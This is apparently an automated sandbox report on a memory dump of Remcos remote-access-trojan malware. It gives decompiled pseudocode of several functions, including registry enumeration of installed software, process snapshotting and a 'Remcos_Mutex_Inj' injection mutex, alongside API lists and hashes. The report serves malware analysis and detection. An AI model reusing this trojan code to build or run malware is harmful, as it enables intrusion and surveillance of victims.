                      				signed int _v8;
                      				char _v21;
                      				intOrPtr _v22;
                      				struct _cpinfo _v28;
                      				void* _v32;
                      				void* _v36;
                      				void* _v40;
                      				intOrPtr* _v44;
                      				signed int _v48;
                      				void* _v52;
                      				signed int* _v56;
                      				intOrPtr _v60;
                      				intOrPtr* _v64;
                      				signed int* _v68;
                      				void* _v72;
                      				char _v76;
                      				signed int _t101;
                      				signed int _t123;
                      				signed short _t126;
                      				void* _t130;
                      				void* _t134;
                      				void* _t137;
                      				void* _t138;
                      				intOrPtr _t139;
                      				void* _t141;
                      				signed int _t142;
                      				intOrPtr* _t143;
                      				signed char _t160;
                      				signed char _t165;
                      				signed int _t166;
                      				void* _t168;
                      				signed int _t170;
                      				void* _t179;
                      				signed int* _t180;
                      				signed int* _t181;
                      				signed int _t182;
                      				signed char* _t189;
                      				signed char* _t190;
                      				signed int _t192;
                      				void* _t193;
                      				intOrPtr _t197;
                      				short* _t209;
                      				intOrPtr* _t211;
                      				intOrPtr* _t215;
                      				signed int _t216;
                      				signed int _t217;
                      				void* _t218;
                      				void* _t219;
                      
                      				_t101 =  *0x7aa00c; // 0x67a7e35e
                      				_v8 = _t101 ^ _t217;
                      				_t211 = _a4;
                      				_t170 = 0;
                      				_v64 = _t211;
                      				_v32 = 0;
                      				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
                      				_v36 = 0;
                      				_v40 = 0;
                      				_v52 = 0;
                      				_v76 = _t211;
                      				_v72 = 0;
                      				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
                      					__eflags =  *(_t211 + 0x8c);
                      					if( *(_t211 + 0x8c) != 0) {
                      						asm("lock dec dword [eax]");
                      					}
                      					 *(_t211 + 0x8c) = _t170;
                      					__eflags = 0;
                      					 *(_t211 + 0x90) = _t170;
                      					 *_t211 = 0x7977b8;
                      					 *((intOrPtr*)(_t211 + 0x94)) = 0x797a38;
                      					 *((intOrPtr*)(_t211 + 0x98)) = 0x797bb8;
                      					 *((intOrPtr*)(_t211 + 4)) = 1;
                      					L41:
                      					return E0076FD1B(_v8 ^ _t217);
                      				}
                      				_t106 = _t211 + 8;
                      				_v44 = 0;
                      				if( *(_t211 + 8) != 0) {
                      					L3:
                      					_v44 = E0077F348(_t172, 1, 4);
                      					E007801F5(_t170);
                      					_v32 = E0077F348(_t172, 0x180, 2);
                      					E007801F5(_t170);
                      					_v36 = E0077F348(_t172, 0x180, 1);
                      					E007801F5(_t170);
                      					_v40 = E0077F348(_t172, 0x180, 1);
                      					E007801F5(_t170);
                      					_t197 = E0077F348(_t172, 0x101, 1);
                      					_v52 = _t197;
                      					E007801F5(_t170);
                      					_t219 = _t218 + 0x3c;
                      					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
                      						L36:
                      						E007801F5(_v44);
                      						E007801F5(_v32);
                      						E007801F5(_v36);
                      						E007801F5(_v40);
                      						_t170 = 1;
                      						__eflags = 1;
                      						goto L37;
                      					} else {
                      						_t123 = _t170;
                      						do {
                      							 *(_t123 + _t197) = _t123;
                      							_t123 = _t123 + 1;
                      						} while (_t123 < 0x100);
                      						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
                      							goto L36;
                      						}
                      						_t126 = _v28;
                      						_t235 = _t126 - 5;
                      						if(_t126 > 5) {
                      							goto L36;
                      						}
                      						_t28 = _t197 + 1; // 0x1
                      						_v48 = _t126 & 0x0000ffff;
                      						_t192 = 0xff;
                      						_t130 = E0078480C(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
                      						_t219 = _t219 + 0x24;
                      						_t236 = _t130;
                      						if(_t130 == 0) {
                      							goto L36;
                      						}
                      						_t34 = _t197 + 1; // 0x1
                      						_t134 = E0078480C(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
                      						_t219 = _t219 + 0x24;
                      						if(_t134 == 0) {
                      							goto L36;
                      						}
                      						if(_v48 <= 1 || _v22 == _t170) {
                      							L22:
                      							_v60 = _v32 + 0x100;
                      							_t137 = E007893AC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
                      							_t219 = _t219 + 0x1c;
                      							if(_t137 == 0) {
                      								goto L36;
                      							}
                      							_t193 = _v32;
                      							_t138 = _t193 + 0xfe;
                      							 *_t138 = 0;
                      							_t179 = _v36;
                      							_v32 = _t138;
                      							_t139 = _v40;
                      							 *(_t179 + 0x7f) = _t170;
                      							_t180 = _t179 - 0xffffff80;
                      							 *(_t139 + 0x7f) = _t170;
                      							_v68 = _t180;
                      							 *_t180 = _t170;
                      							_t181 = _t139 + 0x80;
                      							_v56 = _t181;
                      							 *_t181 = _t170;
                      							if(_v48 <= 1 || _v22 == _t170) {
                      								L32:
                      								_t182 = 0x3f;
                      								memcpy(_t193, _t193 + 0x200, _t182 << 2);
                      								_push(0x1f);
                      								asm("movsw");
                      								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
                      								_push(0x1f);
                      								asm("movsw");
                      								asm("movsb");
                      								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
                      								asm("movsw");
                      								asm("movsb");
                      								_t215 = _v64;
                      								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
                      									asm("lock xadd [ecx], eax");
                      									if((_t142 | 0xffffffff) == 0) {
                      										E007801F5( *(_t215 + 0x90) - 0xfe);
                      										E007801F5( *(_t215 + 0x94) - 0x80);
                      										E007801F5( *(_t215 + 0x98) - 0x80);
                      										E007801F5( *((intOrPtr*)(_t215 + 0x8c)));
                      									}
                      								}
                      								_t143 = _v44;
                      								 *_t143 = 1;
                      								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
                      								 *_t215 = _v60;
                      								 *(_t215 + 0x90) = _v32;
                      								 *(_t215 + 0x94) = _v68;
                      								 *(_t215 + 0x98) = _v56;
                      								 *(_t215 + 4) = _v48;
                      								L37:
                      								E007801F5(_v52);
                      								goto L41;
                      							} else {
                      								_t189 =  &_v21;
                      								while(1) {
                      									_t160 =  *_t189;
                      									if(_t160 == 0) {
                      										break;
                      									}
                      									_t216 =  *(_t189 - 1) & 0x000000ff;
                      									if(_t216 > (_t160 & 0x000000ff)) {
                      										L30:
                      										_t189 =  &(_t189[2]);
                      										if( *(_t189 - 1) != _t170) {
                      											continue;
                      										}
                      										break;
                      									}
                      									_t209 = _t193 + 0x100 + _t216 * 2;
                      									do {
                      										_t216 = _t216 + 1;
                      										 *_t209 = 0x8000;
                      										_t209 = _t209 + 2;
                      									} while (_t216 <= ( *_t189 & 0x000000ff));
                      									goto L30;
                      								}
                      								goto L32;
                      							}
                      						} else {
                      							_t190 =  &_v21;
                      							while(1) {
                      								_t165 =  *_t190;
                      								if(_t165 == 0) {
                      									goto L22;
                      								}
                      								_t192 =  *(_t190 - 1) & 0x000000ff;
                      								_t166 = _t165 & 0x000000ff;
                      								while(_t192 <= _t166) {
                      									 *((char*)(_t192 + _t197)) = 0x20;
                      									_t192 = _t192 + 1;
                      									__eflags = _t192;
                      									_t166 =  *_t190 & 0x000000ff;
                      								}
                      								_t190 =  &(_t190[2]);
                      								_t242 =  *(_t190 - 1) - _t170;
                      								if( *(_t190 - 1) != _t170) {
                      									continue;
                      								}
                      								goto L22;
                      							}
                      							goto L22;
                      						}
                      					}
                      				}
                      				_t168 = E0078B0F4(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
                      				_t219 = _t218 + 0x14;
                      				if(_t168 != 0) {
                      					goto L36;
                      				}
                      				goto L3;
                      			}
                      0x0077f5b3
                      0x0077f5ba
                      0x0077f5bf
                      0x0077f5c2
                      0x0077f5c5
                      0x0077f5c8
                      0x0077f5cb
                      0x0077f5d1
                      0x0077f5d4
                      0x0077f5d7
                      0x0077f5da
                      0x0077f5dd
                      0x0077f5e2
                      0x0077f902
                      0x0077f904
                      0x0077f906
                      0x0077f906
                      0x0077f909
                      0x0077f90f
                      0x0077f911
                      0x0077f917
                      0x0077f91d
                      0x0077f927
                      0x0077f931
                      0x0077f938
                      0x0077f948
                      0x0077f948
                      0x0077f5e8
                      0x0077f5eb
                      0x0077f5f0
                      0x0077f60e
                      0x0077f618
                      0x0077f61b
                      0x0077f62e
                      0x0077f631
                      0x0077f63f
                      0x0077f642
                      0x0077f650
                      0x0077f653
                      0x0077f664
                      0x0077f667
                      0x0077f66a
                      0x0077f66f
                      0x0077f675
                      0x0077f8c9
                      0x0077f8cc
                      0x0077f8d4
                      0x0077f8dc
                      0x0077f8e4
                      0x0077f8ee
                      0x0077f8ee
                      0x00000000
                      0x0077f69e
                      0x0077f69e
                      0x0077f6a0
                      0x0077f6a0
                      0x0077f6a3
                      0x0077f6a4
                      0x0077f6ba
                      0x00000000
                      0x00000000
                      0x0077f6c0
                      0x0077f6c3
                      0x0077f6c6
                      0x00000000
                      0x00000000
                      0x0077f6d3
                      0x0077f6d6
                      0x0077f6d9
                      0x0077f6f6
                      0x0077f6fb
                      0x0077f6fe
                      0x0077f700
                      0x00000000
                      0x00000000
                      0x0077f71a
                      0x0077f72a
                      0x0077f72f
                      0x0077f734
                      0x00000000
                      0x00000000
                      0x0077f73e
                      0x0077f76b
                      0x0077f781
                      0x0077f784
                      0x0077f789
                      0x0077f78e
                      0x00000000
                      0x00000000
                      0x0077f794
                      0x0077f799
                      0x0077f79f
                      0x0077f7a2
                      0x0077f7a5
                      0x0077f7a8
                      0x0077f7ab
                      0x0077f7ae
                      0x0077f7b5
                      0x0077f7b8
                      0x0077f7bb
                      0x0077f7bd
                      0x0077f7c3
                      0x0077f7c6
                      0x0077f7c8
                      0x0077f80a
                      0x0077f80c
                      0x0077f815
                      0x0077f81a
                      0x0077f81d
                      0x0077f827
                      0x0077f829
                      0x0077f82c
                      0x0077f82e
                      0x0077f837
                      0x0077f839
                      0x0077f83b
                      0x0077f83c
                      0x0077f847
                      0x0077f84c
                      0x0077f850
                      0x0077f85e
                      0x0077f871
                      0x0077f87f
                      0x0077f88a
                      0x0077f88f
                      0x0077f850
                      0x0077f892
                      0x0077f895
                      0x0077f89b
                      0x0077f8a4
                      0x0077f8a9
                      0x0077f8b2
                      0x0077f8bb
                      0x0077f8c4
                      0x0077f8ef
                      0x0077f8f2
                      0x00000000
                      0x0077f7cf
                      0x0077f7cf
                      0x0077f7d2
                      0x0077f7d2
                      0x0077f7d6
                      0x00000000
                      0x00000000
                      0x0077f7d8
                      0x0077f7e1
                      0x0077f7ff
                      0x0077f7ff
                      0x0077f805
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0077f805
                      0x0077f7e9
                      0x0077f7ec
                      0x0077f7f1
                      0x0077f7f2
                      0x0077f7f5
                      0x0077f7fb
                      0x00000000
                      0x0077f7ec
                      0x00000000
                      0x0077f807
                      0x0077f745
                      0x0077f745
                      0x0077f748
                      0x0077f748
                      0x0077f74c
                      0x00000000
                      0x00000000
                      0x0077f74e
                      0x0077f752
                      0x0077f75f
                      0x0077f757
                      0x0077f75b
                      0x0077f75b
                      0x0077f75c
                      0x0077f75c
                      0x0077f763
                      0x0077f766
                      0x0077f769
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0077f769
                      0x00000000
                      0x0077f748
                      0x0077f73e
                      0x0077f675
                      0x0077f5fe
                      0x0077f603
                      0x0077f608
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$Info
                      • String ID:
                      • API String ID: 2509303402-0
                      • Opcode ID: 1e6015d3a488d7a1e8ea0364210b233e272c4affa0065cbb6c6c76a167a37267
                      • Instruction ID: 1d69ec8f880ee1d7b00d25ee13602e1ca2e5ea8e725e97b03e1c3fa95ea6210c
                      • Opcode Fuzzy Hash: 1e6015d3a488d7a1e8ea0364210b233e272c4affa0065cbb6c6c76a167a37267
                      • Instruction Fuzzy Hash: 87B18C71D40309DEDF119F78C985BAEBBF4BF08340F14806AE599A7242EA79A845CB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 63%
                      			E00757C05(void* __ebx, void* __ecx) {
                      				void* _v8;
                      				void* _v12;
                      				char _v16;
                      				char _v40;
                      				char _v64;
                      				char _v88;
                      				char _v112;
                      				char _v136;
                      				char _v160;
                      				char _v184;
                      				char _v208;
                      				char _v232;
                      				char _v256;
                      				char _v280;
                      				char _v304;
                      				char _v328;
                      				char _v352;
                      				char _v376;
                      				char _v400;
                      				char _v424;
                      				char _v448;
                      				char _v472;
                      				char _v1500;
                      				void* __edi;
                      				long _t72;
                      				long _t78;
                      				long _t206;
                      				void* _t207;
                      				intOrPtr* _t208;
                      
                      				_t129 = __ebx;
                      				_t207 = __ecx;
                      				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
                      					_v16 = 0x400;
                      					_t206 = 0;
                      					E00741F6D(__ebx,  &_v64);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push( &_v16);
                      					_push( &_v1500);
                      					_push(0);
                      					while(1) {
                      						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
                      						__eflags = _t72 - 0x103;
                      						if(__eflags == 0) {
                      							break;
                      						}
                      						__eflags = _t72;
                      						if(_t72 != 0) {
                      							L8:
                      							_t206 = _t206 + 1;
                      							__eflags = _t206;
                      							_v16 = 0x400;
                      						} else {
                      							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
                      							__eflags = _t78;
                      							if(_t78 == 0) {
                      								E007509BF( &_v40, _v8, L"DisplayName");
                      								 *_t208 = L"Publisher";
                      								E007509BF( &_v184, _v8);
                      								 *_t208 = L"DisplayVersion";
                      								E007509BF( &_v160, _v8);
                      								 *_t208 = L"InstallLocation";
                      								E007509BF( &_v136, _v8);
                      								 *_t208 = L"InstallDate";
                      								E007509BF( &_v112, _v8);
                      								 *_t208 = L"UninstallString";
                      								E007509BF( &_v88, _v8);
                      								__eflags = E00749DB5();
                      								if(__eflags == 0) {
                      									E00743311(E007430A6(_t129,  &_v208, E007430A6(_t129,  &_v232, E00744429(_t129,  &_v256, E007430A6(_t129,  &_v280, E00744429(_t129,  &_v304, E007430A6(_t129,  &_v328, E00744429(_t129,  &_v352, E007430A6(_t129,  &_v376, E00744429(_t129,  &_v400, E007430A6(_t129,  &_v424, E00744429(_t129,  &_v448, E00747514( &_v472,  &_v40, __eflags, 0x7a59c4), __eflags,  &_v160), _t206, __eflags, 0x7a59c4), __eflags,  &_v112), _t206, __eflags, 0x7a59c4), __eflags,  &_v184), _t206, __eflags, 0x7a59c4), __eflags,  &_v136), _t206, __eflags, 0x7a59c4), __eflags,  &_v88), _t206, __eflags, 0x7a59c4), _t206, __eflags, "\n"));
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      								}
                      								RegCloseKey(_v8);
                      								E00741EF0();
                      								E00741EF0();
                      								E00741EF0();
                      								E00741EF0();
                      								E00741EF0();
                      								E00741EF0();
                      								goto L8;
                      							}
                      						}
                      						__eflags = 0;
                      						_push(0);
                      						_push(0);
                      						_push(0);
                      						_push(0);
                      						_push( &_v16);
                      						_push( &_v1500);
                      						_push(_t206);
                      					}
                      					RegCloseKey(_v12);
                      					E0074331A(_t129, _t207, __eflags,  &_v64);
                      					E00741EF0();
                      				} else {
                      					E0074427F(__ebx, _t207, 0x79f724);
                      				}
                      				return _t207;
                      			}
                      0x00757c05
                      0x00757c25
                      0x00757c2f
                      0x00757c45
                      0x00757c4c
                      0x00757c4e
                      0x00757c58
                      0x00757c59
                      0x00757c5a
                      0x00757c5b
                      0x00757c5c
                      0x00757c63
                      0x00757c64
                      0x00757ed8
                      0x00757edb
                      0x00757ee1
                      0x00757ee6
                      0x00000000
                      0x00000000
                      0x00757c6a
                      0x00757c6c
                      0x00757ebe
                      0x00757ebe
                      0x00757ebe
                      0x00757ebf
                      0x00757c72
                      0x00757c87
                      0x00757c8d
                      0x00757c8f
                      0x00757ca0
                      0x00757cae
                      0x00757cb5
                      0x00757cc3
                      0x00757cca
                      0x00757cd8
                      0x00757cdf
                      0x00757cea
                      0x00757cf1
                      0x00757cfc
                      0x00757d03
                      0x00757d11
                      0x00757d13
                      0x00757df3
                      0x00757dfe
                      0x00757e09
                      0x00757e14
                      0x00757e1f
                      0x00757e2a
                      0x00757e35
                      0x00757e40
                      0x00757e4b
                      0x00757e56
                      0x00757e61
                      0x00757e6c
                      0x00757e77
                      0x00757e77
                      0x00757e7f
                      0x00757e88
                      0x00757e90
                      0x00757e9b
                      0x00757ea6
                      0x00757eb1
                      0x00757eb9
                      0x00000000
                      0x00757eb9
                      0x00757c8f
                      0x00757ec6
                      0x00757ec8
                      0x00757ec9
                      0x00757eca
                      0x00757ecb
                      0x00757ecf
                      0x00757ed6
                      0x00757ed7
                      0x00757ed7
                      0x00757eef
                      0x00757efb
                      0x00757f03
                      0x00757c31
                      0x00757c38
                      0x00757c38
                      0x00757f0f

                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00757C27
                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00757EDB
                      • RegCloseKey.ADVAPI32(?), ref: 00757EEF
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseEnumOpen
                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                      • API String ID: 1332880857-3714951968
                      • Opcode ID: fe6975022202f90093b26a6f8fad554e998e548717c2e50856a98274f9ef499f
                      • Instruction ID: 4248b92db015756a717cafaecae4927eda6d88aa2b17427dc446ab80336562c1
                      • Opcode Fuzzy Hash: fe6975022202f90093b26a6f8fad554e998e548717c2e50856a98274f9ef499f
                      • Instruction Fuzzy Hash: 07815671904118EBDB18FB60ED56EEEB37AEF50301F5041AAE90A62151EF785F89CF60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00789546(intOrPtr _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _t25;
                      				intOrPtr* _t26;
                      				intOrPtr _t28;
                      				intOrPtr* _t29;
                      				intOrPtr* _t31;
                      				intOrPtr* _t45;
                      				intOrPtr* _t46;
                      				intOrPtr* _t47;
                      				intOrPtr* _t55;
                      				intOrPtr* _t70;
                      				intOrPtr _t74;
                      
                      				_t74 = _a4;
                      				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                      				if(_t25 != 0 && _t25 != 0x7aa188) {
                      					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                      					if(_t45 != 0 &&  *_t45 == 0) {
                      						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                      						if(_t46 != 0 &&  *_t46 == 0) {
                      							E007801F5(_t46);
                      							E00788782( *((intOrPtr*)(_t74 + 0x88)));
                      						}
                      						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                      						if(_t47 != 0 &&  *_t47 == 0) {
                      							E007801F5(_t47);
                      							E00788C3C( *((intOrPtr*)(_t74 + 0x88)));
                      						}
                      						E007801F5( *((intOrPtr*)(_t74 + 0x7c)));
                      						E007801F5( *((intOrPtr*)(_t74 + 0x88)));
                      					}
                      				}
                      				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                      				if(_t26 != 0 &&  *_t26 == 0) {
                      					E007801F5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                      					E007801F5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                      					E007801F5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                      					E007801F5( *((intOrPtr*)(_t74 + 0x8c)));
                      				}
                      				E007896B9( *((intOrPtr*)(_t74 + 0x9c)));
                      				_t28 = 6;
                      				_t55 = _t74 + 0xa0;
                      				_v8 = _t28;
                      				_t70 = _t74 + 0x28;
                      				do {
                      					if( *((intOrPtr*)(_t70 - 8)) != 0x7aa2a8) {
                      						_t31 =  *_t70;
                      						if(_t31 != 0 &&  *_t31 == 0) {
                      							E007801F5(_t31);
                      							E007801F5( *_t55);
                      						}
                      						_t28 = _v8;
                      					}
                      					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                      						_t29 =  *((intOrPtr*)(_t70 - 4));
                      						if(_t29 != 0 &&  *_t29 == 0) {
                      							E007801F5(_t29);
                      						}
                      						_t28 = _v8;
                      					}
                      					_t55 = _t55 + 4;
                      					_t70 = _t70 + 0x10;
                      					_t28 = _t28 - 1;
                      					_v8 = _t28;
                      				} while (_t28 != 0);
                      				return E007801F5(_t74);
                      			}
                      0x0078954e
                      0x00789552
                      0x0078955a
                      0x00789563
                      0x00789568
                      0x0078956f
                      0x00789577
                      0x0078957f
                      0x0078958a
                      0x00789590
                      0x00789591
                      0x00789599
                      0x007895a1
                      0x007895ac
                      0x007895b2
                      0x007895b6
                      0x007895c1
                      0x007895c7
                      0x00789568
                      0x007895c8
                      0x007895d0
                      0x007895e3
                      0x007895f6
                      0x00789604
                      0x0078960f
                      0x00789614
                      0x0078961d
                      0x00789625
                      0x00789626
                      0x0078962c
                      0x0078962f
                      0x00789632
                      0x00789639
                      0x0078963b
                      0x0078963f
                      0x00789647
                      0x0078964e
                      0x00789654
                      0x00789655
                      0x00789655
                      0x0078965c
                      0x0078965e
                      0x00789663
                      0x0078966b
                      0x00789670
                      0x00789671
                      0x00789671
                      0x00789674
                      0x00789677
                      0x0078967a
                      0x0078967d
                      0x0078967d
                      0x0078968f

                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 0078958A
                        • Part of subcall function 00788782: _free.LIBCMT ref: 0078879F
                        • Part of subcall function 00788782: _free.LIBCMT ref: 007887B1
                        • Part of subcall function 00788782: _free.LIBCMT ref: 007887C3
                        • Part of subcall function 00788782: _free.LIBCMT ref: 007887D5
                        • Part of subcall function 00788782: _free.LIBCMT ref: 007887E7
                        • Part of subcall function 00788782: _free.LIBCMT ref: 007887F9
                        • Part of subcall function 00788782: _free.LIBCMT ref: 0078880B
                        • Part of subcall function 00788782: _free.LIBCMT ref: 0078881D
                        • Part of subcall function 00788782: _free.LIBCMT ref: 0078882F
                        • Part of subcall function 00788782: _free.LIBCMT ref: 00788841
                        • Part of subcall function 00788782: _free.LIBCMT ref: 00788853
                        • Part of subcall function 00788782: _free.LIBCMT ref: 00788865
                        • Part of subcall function 00788782: _free.LIBCMT ref: 00788877
                      • _free.LIBCMT ref: 0078957F
                        • Part of subcall function 007801F5: HeapFree.KERNEL32(00000000,00000000,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?), ref: 0078020B
                        • Part of subcall function 007801F5: GetLastError.KERNEL32(?,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?,?), ref: 0078021D
                      • _free.LIBCMT ref: 007895A1
                      • _free.LIBCMT ref: 007895B6
                      • _free.LIBCMT ref: 007895C1
                      • _free.LIBCMT ref: 007895E3
                      • _free.LIBCMT ref: 007895F6
                      • _free.LIBCMT ref: 00789604
                      • _free.LIBCMT ref: 0078960F
                      • _free.LIBCMT ref: 00789647
                      • _free.LIBCMT ref: 0078964E
                      • _free.LIBCMT ref: 0078966B
                      • _free.LIBCMT ref: 00789683
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: 2e11e412de02299a65fd07570426d20aa826aac2cd59b7585f84b32087a54eef
                      • Instruction ID: 3af6918d59c6278b8509eb01b5c257c31b9524c465becf7c90f5503dc68dd4fd
                      • Opcode Fuzzy Hash: 2e11e412de02299a65fd07570426d20aa826aac2cd59b7585f84b32087a54eef
                      • Instruction Fuzzy Hash: 37317A31A80205EEEB21BA38D84DB6A73E8AF01320F184529E258D7191EF3DEC548B60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E0074CE44(void* __eflags, char _a4) {
                      				void* _v8;
                      				char _v32;
                      				char _v56;
                      				char _v60;
                      				char _v64;
                      				char _v68;
                      				char _v72;
                      				char _v96;
                      				char _v120;
                      				char _v648;
                      				intOrPtr _v676;
                      				void* _v684;
                      				short _v1204;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t76;
                      				struct _SECURITY_ATTRIBUTES* _t106;
                      				char* _t111;
                      				void* _t158;
                      				void* _t161;
                      
                      				_t106 = 0;
                      				GetModuleFileNameW(0,  &_v1204, 0x104);   // hModule == NULL: path of the running image, 0x104 == MAX_PATH
                      				_t149 = "1";
                      				if(E00747744("1") != 0) {
                      					L14:
                      					E00741EFA( &_a4, _t149, _t159, E00756E1B(_t106,  &_v120, _t149));
                      					_t111 =  &_v120;
                      					E00741EF0();
                      					if(E00757614(_t111) != 0) {
                      						_push(_t111);
                      						if(E0074D4AF( &_a4, L"Program Files\\") != 0xffffffff) {   // 0xffffffff is the not-found result of the search helper
                      							E0074D4D0(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");   // 0xe == wcslen(L"Program Files\\"): swaps in the (x86) form
                      						}
                      					}
                      					if(E0074EAE5( &_v1204,  &_a4) != 0) {
                      						L22:
                      						E00741EF0();
                      						return _t106;
                      					} else {
                      						L18:
                      						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");   // named mutex (bInitialOwner == 1); the name is a host indicator
                      						E007420D5(_t106,  &_v96);
                      						E007579DC(E00741EEB(0x7ac500),  &_v96);
                      						E00741F95( &_v96);
                      						if(E0075432B(E00741EEB( &_a4)) == 0) {
                      							CloseHandle(_t158);
                      						} else {
                      							_t106 = 1;
                      							E00750BB0(0x7ac518, E00741F95(0x7ac518), "Inj", 1);
                      						}
                      						E00741FC7();
                      						goto L22;
                      					}
                      				}
                      				E00741F6D(0,  &_v32);
                      				_t76 = CreateToolhelp32Snapshot(2, 0);   // 2 == TH32CS_SNAPPROCESS: snapshot of every running process
                      				_v8 = _t76;
                      				_v684 = 0x22c;   // PROCESSENTRY32W.dwSize (556 bytes), set before Process32FirstW as the API requires
                      				Process32FirstW(_t76,  &_v684);   // result unused: the first entry is overwritten by Process32NextW before it is examined
                      				while(Process32NextW(_v8,  &_v684) != 0) {
                      					E0074427F(_t106,  &_v56,  &_v648);
                      					_t157 = E0074230A( &_v56,  &_v60);
                      					_t159 = E007422CD( &_v56,  &_v64);
                      					E00748226( &_v72,  *((intOrPtr*)(E0074230A( &_v56,  &_v68))),  *_t84,  *_t82);
                      					_t161 = _t161 + 0xc;
                      					if(E00749EAC( &_a4) != 0) {
                      						E00741EFA( &_v32, _v676, _t159, E00757678( &_v120, _v676));
                      						E00741EF0();
                      						if(E00747744( &_v1204) == 0) {
                      							_t149 = 0x79f724;
                      							if(E00747744(0x79f724) != 0 || E00757642(_v676) != 0) {
                      								E00741EF0();
                      								L13:
                      								E00741EF0();
                      								goto L14;
                      							} else {
                      								E00749E56( &_v32);
                      								E00741EF0();
                      								break;
                      							}
                      						}
                      						E00741EF0();
                      						E00741EF0();
                      						goto L22;
                      					}
                      					E00741EF0();
                      				}
                      				CloseHandle(_v8);
                      				_t149 = 0x79f724;
                      				if(E00747744(0x79f724) != 0) {
                      					goto L13;
                      				}
                      				E00741EF0();
                      				goto L18;
                      			}

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,007AC578,00000000,00000001), ref: 0074CE5F
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0074CE85
                      • Process32FirstW.KERNEL32(00000000,?), ref: 0074CEA0
                      • Process32NextW.KERNEL32(0074C873,0000022C), ref: 0074CF11
                      • CloseHandle.KERNEL32(0074C873,?,00000000,?,?,?), ref: 0074CF1E
                      • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0074D034
                      • CloseHandle.KERNEL32(00000000), ref: 0074D096
                        • Part of subcall function 00757678: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0075768D
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                      • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                      • API String ID: 193334293-694575909
